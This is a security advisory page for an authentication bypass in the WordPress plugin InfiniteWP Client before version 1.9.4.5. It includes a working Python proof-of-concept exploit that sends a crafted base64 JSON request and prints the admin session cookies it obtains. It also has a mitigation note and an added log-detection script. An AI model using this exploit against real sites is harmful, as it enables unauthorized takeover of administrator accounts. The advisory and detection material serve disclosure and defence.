Vendor: WordPress Plugin InfiniteWP Client
By: Raphael Karger
CVSS: 8.8 (HIGH)
Type: Authentication Bypass
CWE: 287
Product Name: WordPress Plugin InfiniteWP Client
Affected Version From: InfiniteWP Client < 1.9.4.5
Affected Version To: InfiniteWP Client < 1.9.4.5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
Year: 2020

WordPress Plugin InfiniteWP Client 1.9.4.5 – Authentication Bypass

An authentication bypass vulnerability exists in WordPress Plugin InfiniteWP Client version 1.9.4.5 and prior. An attacker can exploit it to bypass authentication and gain access to the application by sending a crafted HTTP request. The request carries a base64-encoded JSON payload, and the username parameter inside that payload is what is used to bypass authentication.

Mitigation:

Upgrade to InfiniteWP Client version 1.9.4.5 or later.

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass
# Date: 2020-1-16
# Exploit Author: Raphael Karger
# Vendor Homepage: https://infinitewp.com/
# Version: InfiniteWP Client < 1.9.4.5

#!/usr/bin/python3

import requests
import json
import argparse
import base64
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit(site, username):
    json_info = {"iwp_action":"add_site","params":{"username": username}}
    try:
        return requests.post(site, timeout=5, verify=False,
            headers={"User-Agent" : "raphaelrocks"},
            data="_IWP_JSON_PREFIX_{}".format(base64.b64encode(json.dumps(json_info).encode("utf-8")).decode("utf-8"))
        )
    except Exception as e:
        print("[-] HTTP Exploit Error: {}".format(e))
    return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-n", "--username", dest="username", help="Username of admin, default is admin", default="admin")
    parser.add_argument("-u", "--url", dest="url", help="Root URL of Site")
    args = parser.parse_args()
    site_exploit = exploit(args.url, args.username)
    if site_exploit and site_exploit.status_code == requests.codes.ok:
        cookie_string = "; ".join([str(x)+"="+str(y) for x,y in site_exploit.cookies.items()])
        if cookie_string:
            print("[+] Use Cookies to Login: \n{}".format(cookie_string))
            exit(0)
    print("[-] Exploit Failed")
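
For detection, the request shape used by the script above can be matched in captured POST bodies. The following is an added example, not part of the original exploit or the plugin's code; it assumes request bodies are available as strings (for example from a WAF or proxy log), and the function names, verdict labels and sample records are constructed for illustration.

```python
import base64
import json

IWP_PREFIX = "_IWP_JSON_PREFIX_"  # body marker used by the PoC on this page
SUSPECT_ACTIONS = {"add_site"}    # iwp_action value used by the PoC

def classify_body(body):
    """Classify one logged POST body; returns (verdict, detail)."""
    _, found, blob = body.partition(IWP_PREFIX)
    if not found:
        return ("ignore", None)
    try:
        # validate=True rejects junk instead of silently skipping it
        msg = json.loads(base64.b64decode(blob.strip(), validate=True))
    except ValueError:  # covers bad base64, bad UTF-8 and bad JSON
        return ("malformed", None)
    if not isinstance(msg, dict):
        return ("malformed", None)
    action = msg.get("iwp_action")
    params = msg.get("params")
    username = params.get("username") if isinstance(params, dict) else None
    if isinstance(action, str) and action in SUSPECT_ACTIONS and username:
        return ("alert", {"action": action, "username": username})
    return ("iwp_other", {"action": action})

def scan(records):
    """Return (source, action, username) for every alerting record."""
    hits = []
    for src, body in records:
        verdict, detail = classify_body(body)
        if verdict == "alert":
            hits.append((src, detail["action"], detail["username"]))
    return hits

def encode_body(msg):
    """Build a constructed sample body in the logged wire format."""
    return IWP_PREFIX + base64.b64encode(json.dumps(msg).encode()).decode()

# Constructed sample records (documentation IPs): (source, raw POST body)
SAMPLE_LOG = [
    ("192.0.2.10", encode_body({"iwp_action": "add_site", "params": {"username": "admin"}})),
    ("198.51.100.7", encode_body({"iwp_action": "some_other_action", "params": {}})),
    ("203.0.113.5", "log=admin&pwd=x"),
    ("203.0.113.9", IWP_PREFIX + "%%%not-base64%%%"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT", hit)
```

An alert means the body matches the request shape shown on this page; whether the source is a management panel the site owner actually uses still has to be checked during triage.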